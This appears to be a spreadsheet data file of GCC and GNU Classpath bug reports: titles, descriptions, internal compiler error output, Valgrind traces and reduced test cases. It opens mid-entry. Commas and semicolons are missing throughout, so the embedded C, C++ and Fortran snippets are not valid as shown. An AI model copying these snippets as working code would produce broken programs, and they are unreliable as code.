		size_t *_RESTRICT_KYWD char **_RESTRICT_KYWD
		size_t *_RESTRICT_KYWD)
#endif
libcpp configure is run with xgcc which doesn't define _XOPEN_SOURCE 600 but
g++ which is used to compile libcpp does so the value of ICONV_CONST is wrong.
The next failures is in init.c:
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: error: expected identifier before '='
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: error: type '' with no linkage used to declare function 'void::operator()() const' with linkage [-fpermissive]
/vol/gcc/src/hg/trunk/local/libcpp/init.c: In lambda function:
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: error: expected '{' before '=' token
/vol/gcc/src/hg/trunk/local/libcpp/init.c: At global scope:
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: error: lambda expressions only available with -std=c++0x or -std=gnu++0x [-Werror]
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: error: no match for 'operator=' in '{} = '#''
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: note: candidate is:
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: note: &amp;::operator=(const&amp;)
/vol/gcc/src/hg/trunk/local/libcpp/init.c:61:3: note:   no known conversion for argument 1 from 'char' to 'const&amp;'
And many more errors.  The relevant section in the -g3 -save-temps outputis
__extension__ const uchar _cpp_trigraph_map[(127 * 2 + 1) + 1] = {
  ['='] = '#' [')'] = ']' ['!'] = '|'
  ['('] = '[' ['\''] = '^' ['&gt;'] = '}'
  ['/'] = '\\' ['&lt;'] = '{' ['-'] = '~'
}</t>
  </si>
  <si>
    <t>GCC-48645</t>
  </si>
  <si>
    <t>[4.7 Regression] 403.gcc in SPEC CPU 2006 failed to build</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 172517 gave
g++  -O3 -funroll-loops -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin ...
lto1: internal compiler error: in estimate_size_after_inlining at ipa-inline-analysis.c:425
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: gcc returned 1 exit status
/usr/local/bin/ld: lto-wrapper failed
collect2: ld returned 1 exit status
specmake[3]: *** [gcc] Error 1
Revision 172408 is OK. It can also be reproduced with LTO bootstrap on gcc.</t>
  </si>
  <si>
    <t>GCC-43464</t>
  </si>
  <si>
    <t>copy prop breaks loop closed SSA form</t>
  </si>
  <si>
    <t>When copy propagation is called from the loop optimizer copy prop
does not update the loop closed SSA form and we end up on a
representation that crashes on verify_loop_closed_ssa ().
This bug appeared on the Graphite branch with -O3 on the attached
testcase reduced from perlbench.
Note that the graphite pass does not execute for this testcase as
there are more than 100 basic blocks in its CFG only the cleanup
passes that are scheduled after the graphite pass are run: so this bug
is not related to Graphite and could also occur in the current pass
ordering after we build the loop closed SSA form:
	  NEXT_PASS (pass_tree_loop_init)
	  NEXT_PASS (pass_copy_prop)
	  NEXT_PASS (pass_dce_loop)
	  NEXT_PASS (pass_lim)</t>
  </si>
  <si>
    <t>GCC-8410</t>
  </si>
  <si>
    <t>ICE in size_binop at fold-const.c:1436</t>
  </si>
  <si>
    <t>ICE in size_binop when compiling from a .class file generated with Sun's JDK 1.4.
Release:
gcc version 3.3 20021029 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/user/jmr/app/gcc --enable-langu
ages=c++java --enable-threads=posix --enable-shared --with-as=/home/user/jmr/ap
p/binutils/bin/as --with-ld=/home/user/jmr/app/binutils/bin/ld : (reconfigured) 
 : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reco
nfigured)
How-To-Repeat:
See java/7883.  I'm still getting this.  Perhaps the class file wasn't compiled with 1.4 when it was tested.  I didn't make that clear in the other PR.
http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=7883</t>
  </si>
  <si>
    <t>GCC-80805</t>
  </si>
  <si>
    <t>ICE in sufficiently complex code with -g (dump_aggr_type)</t>
  </si>
  <si>
    <t>The following program crashes gcc versions 5.1 to recent trunk (20170517 on godbolt.org) when compiled with -std=c++11 -g (the -g seems to be essential):
template struct R { using type = T }
template F r(typename R::type f) { return f }
template void s(F) {}
template void t(F f) { s(r(f)) }
template struct S {}
template struct P { constexpr static bool value = false }
template
void g()
{
    constexpr static bool H = P::value
    using X = S
    []() -&gt; X
    {
        t([]{})
        return X{}
    }()
}
int main() { g() }
I haven't been able to reduce the test case any further - almost any change to the above avoids the crash - although it's possible I'm stuck on a local minimum.
Valgrind shows:
==22516== Memcheck a memory error detector
==22516== Copyright (C) 2002-2012 and GNU GPL'd by Julian Seward et al.
==22516== Using Valgrind-3.8.1 and LibVEX rerun with -h for copyright info
==22516== Command: /usr/local/gcc-7.1.0/libexec/gcc/x86_64-pc-linux-gnu/7.1.0/cc1plus -quiet -D_GNU_SOURCE x.cpp -quiet -dumpbase x.cpp -mtune=generic -march=x86-64 -auxbase x -g -std=c++11 -o /tmp/ccxmO5KA.s
==22516== 
==22516== Invalid read of size 8
==22516==    at 0x627FDF: tsubst_decl(tree_node* tree_node* int) (hash-table.h:875)
==22516==    by 0x6162C8: tsubst_copy(tree_node* tree_node* int tree_node*) [clone .part.192] (pt.c:14590)
==22516==    by 0x620076: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) [clone .part.194] (pt.c:14433)
==22516==    by 0x61F7A1: tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool) [clone .part.194] (pt.c:16710)
==22516==    by 0x613F97: tsubst_expr(tree_node* tree_node* int tree_node* bool) [clone .part.187] (pt.c:16468)
==22516==    by 0x6180C0: tsubst_template_arg(tree_node* tree_node* int tree_node*) (pt.c:10805)
==22516==    by 0x619D52: tsubst_template_args(tree_node* tree_node* int tree_node*) (pt.c:11697)
==22516==    by 0x626B7C: tsubst_aggr_type(tree_node* tree_node* int tree_node* int) (pt.c:11899)
==22516==    by 0x616F48: tsubst(tree_node* tree_node* int tree_node*) (pt.c:13405)
==22516==    by 0x6518F2: dump_substitution(cxx_pretty_printer* tree_node* tree_node* tree_node* int) [clone .part.53] (error.c:353)
==22516==    by 0x654059: dump_scope(cxx_pretty_printer* tree_node* int) (error.c:153)
==22516==    by 0x653573: dump_aggr_type(cxx_pretty_printer* tree_node* int) (error.c:666)
==22516==  Address 0x8 is not stack'd malloc'd or (recently) free'd
==22516== 
==22516== 
==22516== Process terminating with default action of signal 11 (SIGSEGV)
==22516==  General Protection Fault
==22516==    at 0x6B88E9: lookup_member(tree_node* tree_node* int bool int) (search.c:1291)
==22516==    by 0x708503: lambda_function(tree_node*) (lambda.c:205)
==22516==    by 0x6533C4: dump_aggr_type(cxx_pretty_printer* tree_node* int) (error.c:692)
==22516==    by 0x651FA0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1508)
==22516==    by 0x654059: dump_scope(cxx_pretty_printer* tree_node* int) (error.c:153)
==22516==    by 0x653573: dump_aggr_type(cxx_pretty_printer* tree_node* int) (error.c:666)
==22516==    by 0x6530D5: dump_template_parms(cxx_pretty_printer* tree_node* int int) (error.c:1870)
==22516==    by 0x657351: cp_printer(pretty_printer* text_info* char const* int bool bool bool) (error.c:3033)
==22516==    by 0x11F0942: pp_format(pretty_printer* text_info*) (pretty-print.c:679)
==22516==    by 0x11F11B0: pp_format_verbatim(pretty_printer* text_info*) (pretty-print.c:738)
==22516==    by 0x11F1284: pp_verbatim(pretty_printer* char const* ...) (pretty-print.c:939)
==22516==    by 0x6509F5: print_instantiation_full_context(diagnostic_context*) (error.c:3388)
==22516== 
When compiled without -g the program compiles without warning (at -O3 -Wall -Wextra) and appears to run fine. Clang icc and MSVC are happy with it.</t>
  </si>
  <si>
    <t>GCC-54800</t>
  </si>
  <si>
    <t>libiberty/simple-object-mach-o.c:704: possible optimisation ?</t>
  </si>
  <si>
    <t>I just tried the latest cppcheck over the source code
of trunk and it said
[trunk/libiberty/simple-object-mach-o.c:704] -&gt; [trunk/libiberty/simple-object-mach-o.c:705]: (performance) Buffer 'namebuf' is being written before its old content has been used.
The source code is
      memset (namebuf 0 MACH_O_NAME_LEN * 2 + 2)
      memcpy (namebuf (char *) sechdr + segname_offset MACH_O_NAME_LEN)
Maybe something like
      memcpy (namebuf (char *) sechdr + segname_offset MACH_O_NAME_LEN)
      memset (
might be faster and simpler ?</t>
  </si>
  <si>
    <t>GCC-30512</t>
  </si>
  <si>
    <t>[4.1 only] MAXVAL() incorrect for zero-size int arrays and for -HUGE-1 maximum values.</t>
  </si>
  <si>
    <t>Consider the following program:
debian-gfortran:~/test&gt; cat maxval.f90
integer(1) :: i(3)
logical :: msk(3)
i = -huge(i)
i = i - 1
write(**) i
write(**) maxval(i)
msk = .false.
i = 1
write(**) i
write(**) -huge(i) maxval(i msk)
end
In both of these cases the result of the MAXVAL call should be -huge(i)-1.  (For the latter case see the standard on the definition of the intrinsic which says that the result is the negative number with the largest magnitude possible within the representation).  However the actual result is this:
debian-gfortran:~/test&gt; ../bin-trunk/bin/gfortran maxval.f90 -o maxval
debian-gfortran:~/test&gt; ./maxval
 -128 -128 -128
 -127
    1    1    1
 -127 -127
This error holds for larger integer kinds as well.
The error seems to stem from the libgfortran implementation in which the initial search value is initialized as -GFC_INTEGER__HUGE where it should be one less than that.</t>
  </si>
  <si>
    <t>GCC-24009</t>
  </si>
  <si>
    <t>[4.1 regression] C++ fails to print #include stack</t>
  </si>
  <si>
    <t>For the following program  
  #define _POSIX_C_SOURCE 1  
  #include   
g++ issues the following error message:  
  /gcc-current/bin/../lib/gcc/i386-unknown-freebsd5.4/4.1.0/../../../../include/c++/4.1.0/cwchar:166:  
error: '::vfwscanf' has not been declared  
  /gcc-current/bin/../lib/gcc/i386-unknown-freebsd5.4/4.1.0/../../../../include/c++/4.1.0/cwchar:170:  
error: '::vswscanf' has not been declared  
  /gcc-current/bin/../lib/gcc/i386-unknown-freebsd5.4/4.1.0/../../../../include/c++/4.1.0/cwchar:174:  
error: '::vwscanf' has not been declared   
  /gcc-current/bin/../lib/gcc/i386-unknown-freebsd5.4/4.1.0/../../../../include/c++/4.1.0/cwchar:191:  
error: '::wcstof' has not been declared  
This bug report is _not_ about the specific error messages as such but  
about the fact that g++ fails to provide the full #include stack that is  
  a) the name of the file compiled and  
  b) the name of all the #include files involved which led to this.  
Contrast this with the corresponding diagnosis from GCC 3.4:  
  In file included from /usr/include/c++/3.4/bits/postypes.h:46  
                   from /usr/include/c++/3.4/iosfwd:50  
                   from /usr/include/c++/3.4/ios:44  
                   from /usr/include/c++/3.4/ostream:45  
                   from /usr/include/c++/3.4/iostream:45  
                   from x.cc:3:  
  /usr/include/c++/3.4/cwchar:166: error: `::vfwscanf' has not been declared  
  /usr/include/c++/3.4/cwchar:170: error: `::vswscanf' has not been declared  
  /usr/include/c++/3.4/cwchar:174: error: `::vwscanf' has not been declared  
  /usr/include/c++/3.4/cwchar:191: error: `::wcstof' has not been declared  
which is much more useful.</t>
  </si>
  <si>
    <t>CLASSPATH-25141</t>
  </si>
  <si>
    <t>java.net.URL(URL context String spec) constructor does not pass-through java.net.URLStreamHandler impl from context</t>
  </si>
  <si>
    <t>If one creates a base URL with a custom java.net.URLStreamHandler eg
  URL base = new URL(acme
                     www.redhat.com
                     80
                     /docs/
                     new ACMEHandler())
And then create a second URL using this original as the base context:
  URL other = new URL(base manuals/enterprise/)
Then the java.net.URL impl in ClassPath will throw
  java.net.MalformedURLException: Protocol handler not found: acme
In the Sun / IBM  JVMs however the 'ACMEHandler' object from the 'base' URL
will be passed through to the 'other' URL object and no exception is thrown.</t>
  </si>
  <si>
    <t>berrange</t>
  </si>
  <si>
    <t>GCC-41493</t>
  </si>
  <si>
    <t>[4.5 regression] ACATS c34006g fails on sparc-rtems</t>
  </si>
  <si>
    <t>sparc-rtems4.10-gcc (GCC) 4.5.0 20090928 (experimental) [trunk revision 152239]
Test ran as of  r151936.
.. C34006G ACATS 2.5 88-01-01 00:00:00
---- C34006G CHECK THAT THE REQUIRED PREDEFINED OPERATIONS ARE DECLARED
                (IMPLICITLY) FOR DERIVED RECORD TYPES WITHOUT
                DISCRIMINANTS AND WITH A LIMITED COMPONENT TYPE.
   * C34006G INCORRECT SELECTION (ASSIGNMENT).
**** C34006G FAILED ****************************.</t>
  </si>
  <si>
    <t>GCC-12440</t>
  </si>
  <si>
    <t>[3.3 Regression] gcc 3.3.1 on i386 linux 2.4.22 crashes during compilation of quicktime4linux 2.0.0</t>
  </si>
  <si>
    <t>The compiler crashes during compilation of the quicktime4linux library. I have stripped 
out the relevant files and will attached them to this report. Provoke the crash by calling: 
&gt; gcc --save-temps -c `cat ./c_flags`  cmodel_default.c -o i686/cmodel_default.o 
gcc: Internal error: Killed (program cc1) 
Please submit a full bug report. 
See  for instructions. 
The files in the directory are: 
fritz@linux:~/quicktime4linux-2.0.0/bla &gt; ls 
c_flags           cmodel_default.i  cmodel_permutation.h 
cmodel_default.c  cmodel_default.s  colormodels.h 
This is information about the compiler: 
fritz@linux:~/quicktime4linux-2.0.0/bla &gt; gcc -v 
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/specs 
Configured with: ./configure --prefix=/usr 
Thread model: posix 
gcc version 3.3.1 
and the underlying OS: 
&gt; uname -a 
Linux linux 2.4.22 #6 Wed Sep 24 15:01:32 CEST 2003 i686 unknown 
fritz@linux:~/quicktime4linux-2.0.0/bla &gt; nasm -v 
NASM version 0.98.38 compiled on Sep 29 2003</t>
  </si>
  <si>
    <t>fritz</t>
  </si>
  <si>
    <t>GCC-7405</t>
  </si>
  <si>
    <t>Re: bootstrap: Illegal .size expression</t>
  </si>
  <si>
    <t xml:space="preserve"> On Thu Jul 25 2002 at 02:27:45PM -0000 pinskia@physics.uc.edu wrote:
 &gt; libgcc2.s: Assembler messages:
 &gt; libgcc2.s:294: Error: Illegal .size expression
 ...
 &gt; -       .size   ___muldi3 _.-___muldi3
 &gt; +       .size   ___muldi3  . - ___muldi3
 Gnnn.  I was not expecting underscore-prefixing to happen.
 Could you please apply the appended patch to your tree and retest?
 It is a hack but will at least let me know if the problem is what I
 believe it is.
 zw
 Index: defaults.h
 ===================================================================
 RCS file: /cvs/gcc/gcc/gcc/defaults.hv
 retrieving revision 1.84
 diff -u -p -r1.84 defaults.h
 --- defaults.h	25 Jul 2002 05:14:17 -0000	1.84
 +++ defaults.h	25 Jul 2002 16:00:33 -0000
 @@ -2059 +2057 @@ do { fputs (integer_asm_op (POINTER_SIZE
      {							\
        fputs (SIZE_ASM_OP STREAM)			\
        assemble_name (STREAM BEG)			\
 -      fputs (  STREAM)				\
 -      assemble_name (STREAM END)			\
 -      putc ('-' STREAM)				\
 +      fputs ( .- STREAM)				\
        assemble_name (STREAM BEG)			\
        putc ('\n' STREAM)				\
      }							\
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-56350</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in vectorizable_reduction at tree-vect-loop.c:4731</t>
  </si>
  <si>
    <t>Using GCC 4.8.0 as of 20130215 :
$ cat vect.c
int a b c
void f(void)
{
    for( c c++)
        for(b = 0 b &lt; 2 b++)
            a /= 8
}
$ xgcc -O1 -ftree-vectorize -w vect.c
vect.c: In function â€˜fâ€™:
vect.c:3:6: internal compiler error: in vectorizable_reduction at tree-vect-loop.c:4731
 void f(void)
      ^
0xa8e953 vectorizable_reduction(gimple_statement_d* gimple_stmt_iterator* gimple_statement_d** _slp_tree*)
	../../srcdir/gcc/tree-vect-loop.c:4727
0xa81ff0 vect_analyze_stmt(gimple_statement_d* bool* _slp_tree*)
	../../srcdir/gcc/tree-vect-stmts.c:5691
0xa80f75 vect_analyze_stmt(gimple_statement_d* bool* _slp_tree*)
	../../srcdir/gcc/tree-vect-stmts.c:5613
0x4cffb9 vect_analyze_loop_operations
	../../srcdir/gcc/tree-vect-loop.c:1443
0xa8c064 vect_analyze_loop_2
	../../srcdir/gcc/tree-vect-loop.c:1720
0xa8c064 vect_analyze_loop(loop*)
	../../srcdir/gcc/tree-vect-loop.c:1773
0xa9e06c vectorize_loops()
	../../srcdir/gcc/tree-vectorizer.c:113
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-52969</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE in in get_expr_operands at tree-ssa-operands.c:1035 with -ftree-loop-if-convert-stores</t>
  </si>
  <si>
    <t>Created attachment 27147
source code (generated with -E)
compiling the attached real-life code I get
c++ -v -O3 -std=c++0x -ftree-loop-if-convert-stores -c buggy.i
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/lto-wrapper
Target: x86_64-apple-darwin11.3.0
Configured with: ./configure --enable-languages=cc++fortran --disable-multilib --disable-bootstrap --enable-lto -disable-libitm
Thread model: posix
gcc version 4.7.0 20120205 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.3' '-v' '-O3' '-std=c++11' '-ftree-loop-if-convert-stores' '-c' '-shared-libgcc' '-mtune=core2'
 /usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/cc1plus -fpreprocessed buggy.i -fPIC -quiet -dumpbase buggy.i -mmacosx-version-min=10.7.3 -mtune=core2 -auxbase buggy -O3 -std=c++11 -version -ftree-loop-if-convert-stores -o /var/folders/hd/vml6pgj48xjfkp006s6djxf80000gq/T//ccT2Uqbf.s
GNU C++ (GCC) version 4.7.0 20120205 (experimental) (x86_64-apple-darwin11.3.0)
	compiled by GNU C version 4.7.0 20111201 (experimental) GMP version 4.3.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.7.0 20120205 (experimental) (x86_64-apple-darwin11.3.0)
	compiled by GNU C version 4.7.0 20111201 (experimental) GMP version 4.3.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3c7081ac5da07d4d6f6ca789c3e35f66
unhandled expression in get_expr_operands():
 &lt;truth_not_expr 0x1050e00a0
    type &lt;boolean_type 0x141b1bb28 bool sizes-gimplified public unsigned type_6 QI
        size 
        unit size 
        align 8 symtab 0 alias set 14 canonical type 0x141b1bb28 precision 1 min  max 
        pointer_to_this  reference_to_this &gt;
    arg 0 
        arg 0 
            visited var def_stmt maxpix_135 = MEM[(struct SiStripTemplate *)templ_76(D) + 40B]
            version 135&gt;
        arg 1 
            visited var def_stmt D.104278_144 = qscale_123 * D.104277_143
            version 144&gt;
        SiStripTemplateReco.cc:160:5&gt;
    SiStripTemplateReco.cc:160:5&gt;
SiStripTemplateReco.cc: In function â€˜int SiStripTemplateReco::StripTempReco1D(int float float float std::vector&amp; SiStripTemplate&amp; float&amp; float&amp; float&amp; int&amp; int float&amp;)â€™:
SiStripTemplateReco.cc:79:5: internal compiler error: in get_expr_operands at tree-ssa-operands.c:1035
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
pb-d-128-141-131-26:bugs48 innocent$ c++ -v -O3 -std=c++0x  -c buggy.i
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/lto-wrapper
Target: x86_64-apple-darwin11.3.0
Configured with: ./configure --enable-languages=cc++fortran --disable-multilib --disable-bootstrap --enable-lto -disable-libitm
Thread model: posix
gcc version 4.7.0 20120205 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.3' '-v' '-O3' '-std=c++11' '-c' '-shared-libgcc' '-mtune=core2'
 /usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/cc1plus -fpreprocessed buggy.i -fPIC -quiet -dumpbase buggy.i -mmacosx-version-min=10.7.3 -mtune=core2 -auxbase buggy -O3 -std=c++11 -version -o /var/folders/hd/vml6pgj48xjfkp006s6djxf80000gq/T//ccLlzfNR.s
GNU C++ (GCC) version 4.7.0 20120205 (experimental) (x86_64-apple-darwin11.3.0)
	compiled by GNU C version 4.7.0 20111201 (experimental) GMP version 4.3.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.7.0 20120205 (experimental) (x86_64-apple-darwin11.3.0)
	compiled by GNU C version 4.7.0 20111201 (experimental) GMP version 4.3.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3c7081ac5da07d4d6f6ca789c3e35f66
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.3' '-v' '-O3' '-std=c++11' '-c' '-shared-libgcc' '-mtune=core2'
 as -arch x86_64 -force_cpusubtype_ALL -o buggy.o /var/folders/hd/vml6pgj48xjfkp006s6djxf80000gq/T//ccLlzfNR.s
COMPILER_PATH=/usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/:/usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/4.7.0/:/usr/local/libexec/gcc/x86_64-apple-darwin11.3.0/:/usr/local/lib/gcc/x86_64-apple-darwin11.3.0/4.7.0/:/usr/local/lib/gcc/x86_64-apple-darwin11.3.0/
LIBRARY_PATH=/usr/local/lib/gcc/x86_64-apple-darwin11.3.0/4.7.0/:/usr/local/lib/gcc/x86_64-apple-darwin11.3.0/4.7.0/../../../:/usr/lib/
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.3' '-v' '-O3' '-std=c++11' '-c' '-shared-libgcc' '-mtune=core2'
same on linux with 4.7.0
c++ -O3 -std=c++0x -ftree-loop-if-convert-stores -c buggy.i -v
Using built-in specs.
COLLECT_GCC=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/bin/c++
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --disable-multilib --disable-nls --enable-languages=cc++fortran --enable-gold=yes --enable-lto --with-gmp=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --with-mpfr=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --with-mpc=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --with-ppl=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --with-cloog=/build/da/build-BOOTSTRAP_slc5_amd64_gcc470/b/tmp/BUILDROOT/de8f21fa6a50f532872e71e7ff72a173/opt/cmssw/slc5_amd64_gcc470/external/gcc/4.7.0 --enable-cloog-backend=isl --enable-shared CC='gcc -fPIC' CXX='c++ -fPIC' CPP=cpp CXXCPP='c++ -E'
Thread model: posix
gcc version 4.7.0 20120302 (prerelease) (GCC) 
COLLECT_GCC_OPTIONS='-O3' '-std=c++11' '-ftree-loop-if-convert-stores' '-c' '-v' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -fpreprocessed buggy.i -quiet -dumpbase buggy.i -mtune=generic -march=x86-64 -auxbase buggy -O3 -std=c++11 -version -ftree-loop-if-convert-stores -o /tmp/innocent/ccEsHv8G.s
GNU C++ (GCC) version 4.7.0 20120302 (prerelease) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20120302 (prerelease) GMP version 5.0.2 MPFR version 3.0.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.7.0 20120302 (prerelease) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20120302 (prerelease) GMP version 5.0.2 MPFR version 3.0.1 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 69c1686c229166b95e41aad94dc9fb81
SiStripTemplateReco.cc: In function 'int SiStripTemplateReco::StripTempReco1D(int float float float std::vector&amp; SiStripTemplate&amp; float&amp; float&amp; float&amp; int&amp; int float&amp;)':
SiStripTemplateReco.cc:79:5: internal compiler error: in get_expr_operands at tree-ssa-operands.c:1035
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-47530</t>
  </si>
  <si>
    <t>[trans-mem] tail call optimization problem with _ITM_commitTransaction</t>
  </si>
  <si>
    <t>According to:
http://gcc.gnu.org/ml/gcc/2011-01/msg00314.html
http://gcc.gnu.org/ml/gcc/2011-01/msg00279.html
The tail call optimization should not be possible on _ITM_commitTransaction because this function can go (longjmp) to _ITM_beginTransaction and thus the stack will be corrupted.
Here ASM:
_function:
        pushq   %r12
        pushq   %rbp
        pushq   %rbx
        subq    $16 %rsp
...
        call    _ITM_beginTransaction
.L8:
...
        call    _ITM_WU8
        addq    $16 %rsp
        popq    %rbx
        popq    %rbp
        popq    %r12
        jmp     _ITM_commitTransaction
In this example if _ITM_commitTransaction rolls back to L8 the function epilogue will restore wrong values to registers (modified by the function _ITM_commitTransaction) when leaving the _function.
Moreover I think that the function _ITM_beginTransaction should have the flag ECS_RETURNS_TWICE because it is how it behaves (ie the transaction can abort and longjmp behind the _ITM_beginTransaction call).
Draft patch proposed in http://gcc.gnu.org/ml/gcc/2011-01/msg00279.html
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-57224</t>
  </si>
  <si>
    <t>Remove __builtin_ia32_cmpngtss and __builtin_ia32_cmpngess</t>
  </si>
  <si>
    <t>Hello
the builtins __builtin_ia32_cmpngtss and __builtin_ia32_cmpngess are unused (_mm_cmpngt_ss uses __builtin_ia32_cmpnltss instead) undocumented and produce confusing results (they swap operands so the high elements of the vector are taken from the second operand instead of the first one like all other cmp*ss). I think it would be best to remove them.</t>
  </si>
  <si>
    <t>GCC-71717</t>
  </si>
  <si>
    <t>A gfortran silent wrong code bug in the transition from 4.9.0 -&gt; 4.9.1 using OpenMP.</t>
  </si>
  <si>
    <t>Created attachment 38805
The (reduced) failing code.
The attached code shows that code that worked with gfortran -fopenmp in 4.9.0 doesn't work with 4.9.1 anymore.
As 4.9.1 introduced the OpenMP standard 4 it might be related to that update.
Compile the attached code with gfortran -fopenmp .
The output of the executable should be four zeros.</t>
  </si>
  <si>
    <t>GCC-50347</t>
  </si>
  <si>
    <t>unexpected -Wconversion error from gcc builtin</t>
  </si>
  <si>
    <t>This message is produced from the code example below.
bug.c: In function 'main':
bug.c:17:2: warning: conversion to 'long long int' from 'long long unsigned int' may change the sign of the result [-Wsign-conversion]
builtin_ffsll is documented as:-
Built-in Function: int __builtin_ffsll (unsigned long long)
    Similar to __builtin_ffs except the argument type is unsigned long long. 
Note this does not happen with the other similar builtin's (__ctzll for example)
-----------------------------------------------------------------
#include 
#include 
int
main( int argc char *argv[] )
{
  if( argc &gt; 1 )
  {
    char *tail
    unsigned long long n = strtoull( argv[1] 
    if( tail == argv[1] )
      return 1
    int lsb = __builtin_ffsll( n )
    printf(lsb = %d\n lsb )
  }
  return 0
}
-------------------------------------------------------------------
* gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/i686-pc-linux-gnu/4.6.1/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.6.1/configure
Thread model: posix
gcc version 4.6.1 (GCC)</t>
  </si>
  <si>
    <t>gcc.hall</t>
  </si>
  <si>
    <t>GCC-60505</t>
  </si>
  <si>
    <t>[4.8 Regression] Warning caused by GCC vectorizer.</t>
  </si>
  <si>
    <t>The compilation on the code below fails with options -Wall  -Werror -O2 -ftree-loop-vectorize. The reason is that the epilogue generated by the vectorizer tries to access the memory outside of ovec[16] and the the vrp pass emits the warning array subscript is above array bounds for the access to ovec[i]. The vectorizer should not generate the epilogue for this loop.
void foo(char *in char *out int num)
{
 int i
 unsigned char ovec[16] = {0}
 for(i=0 i &lt; num  ++i)
   out[i] = (ovec[i] = in[i])
 out[num] = ovec[num/2]
}</t>
  </si>
  <si>
    <t>congh</t>
  </si>
  <si>
    <t>GCC-11515</t>
  </si>
  <si>
    <t>[3.3 only] mingw32 fails to build gnatlib due to missing sys/wait.h</t>
  </si>
  <si>
    <t>Building a cross-compiler to i386-pc-mingw32 fails when build gnatlib:
make -C gcc gnatlib_and_tools
...
make[2]: Entering directory `/home/dara/branch/objdir/gcc/ada/rts'
../../xgcc -B../../ -c -DCROSS_COMPILE -DIN_GCC   `echo -g -O2  -fexceptions 
-DIN_RTS |sed -e 's/-pedantic//g' -e 's/-Wtraditional//g'`       
-DCYGWIN_CROSS_DIR=\/usr/local/i386-pc-mingw32//i386-pc-mingw32\ -I. -I.. -I..
